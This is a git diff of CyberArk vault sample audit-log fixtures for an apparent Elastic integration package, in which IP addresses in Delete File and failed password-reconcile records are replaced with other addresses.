-<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-35.192.121.42-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-35.192.121.42-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"35.192.121.42"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T21:06:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:06:40\n 2021-03-11T21:06:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\Operating System-WinDomain-67.43.156.14-PSMConnect\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:40","IsoTimestamp":"2021-03-11T21:06:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-WinDomain-67.43.156.14-PSMConnect","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"67.43.156.14"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
 <5>1 2021-03-11T21:06:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n 
\n yes\n Mar 11 13:06:50\n 2021-03-11T21:06:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSM-ASR-CYBERARK-WI\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:06:50","IsoTimestamp":"2021-03-11T21:06:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMConnect"},{"Name":"Address","Value":"10.128.0.65"},{"Name":"LogonDomain","Value":"ASR-CYBERARK-WI"}]}}}}
 <5>1 2021-03-14T12:10:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:10:17\n 2021-03-14T12:10:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n PSM\n Root\\PSMAdmin\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:10:17","IsoTimestamp":"2021-03-14T12:10:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMAdmin","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"UserName","Value":"PSMAdminConnect"},{"Name":"Address","Value":"169.254.180.25"},{"Name":"LogonDomain","Value":"VAGRANT-2012-R2"}]}}}}
 <5>1 2021-03-15T15:09:00Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:09:00\n 2021-03-15T15:09:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 52\n Delete File\n Info\n Administrator\n Delete File\n \n \n partner\n Root\\Database-Oracle-10.128.0.7-adrian\n 127.0.0.1\n \n \n \n \n \n Delete File\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:09:00","IsoTimestamp":"2021-03-15T15:09:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"52","Desc":"Delete File","Severity":"Info","Issuer":"Administrator","Action":"Delete File","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-Oracle-10.128.0.7-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Delete File","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"Oracle"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"10.128.0.7"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log
index 2a5483207bf..f526f3989a1 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/60_cpm_reconcile_password_failed.log 
@@ -1,9 +1,9 @@
-<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615497142"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-14T13:18:15Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:18:15\n 2021-03-14T13:18:15Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:18:15","IsoTimestamp":"2021-03-14T13:18:15Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #2). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615727895"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-14T13:46:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:46:13\n 2021-03-14T13:46:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 
60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:46:13","IsoTimestamp":"2021-03-14T13:46:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-14T14:49:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 07:49:11\n 2021-03-14T14:49:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 07:49:11","IsoTimestamp":"2021-03-14T14:49:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615733350"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T10:12:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:18\n 2021-03-15T10:12:18Z\n VAULT\n Cyber-Ark\n Vault\n 
11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:18","IsoTimestamp":"2021-03-15T10:12:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #4). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T10:12:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:19\n 2021-03-15T10:12:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:19","IsoTimestamp":"2021-03-15T10:12:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615803137"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T12:57:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 05:57:13\n 2021-03-15T12:57:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 05:57:13","IsoTimestamp":"2021-03-15T12:57:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n","ExtraDetails":"address=34.66.114.180;retriescount=5;username=ELASTIC\\bart;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"CPMDisabled","Value":"(CPM)MaxRetries"},{"Name":"RetriesCount","Value":"5"},{"Name":"LastFailDate","Value":"1615813031"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Parameter Reconcile account is mandatory but has an empty value or is not defined"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:04:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:04:27\n 2021-03-15T13:04:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\n address=34.123.103.115;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:04:27","IsoTimestamp":"2021-03-15T13:04:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n","ExtraDetails":"address=34.123.103.115;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T14:44:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:44:37\n 2021-03-15T14:44:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\n address=34.123.103.115;retriescount=1;username=testark;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:44:37","IsoTimestamp":"2021-03-15T14:44:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n","ExtraDetails":"address=34.123.103.115;retriescount=1;username=testark;","Message":"CPM Reconcile Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<7>1 2021-03-11T21:12:22Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:12:22\n 2021-03-11T21:12:22Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 60\n CPM Reconcile Password Failed\n Error\n PasswordManager\n CPM Reconcile Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). 
Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\n address=67.43.156.15;username=ELASTIC\\bart;\n CPM Reconcile Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:12:22","IsoTimestamp":"2021-03-11T21:12:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"60","Desc":"CPM Reconcile Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Reconcile Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not 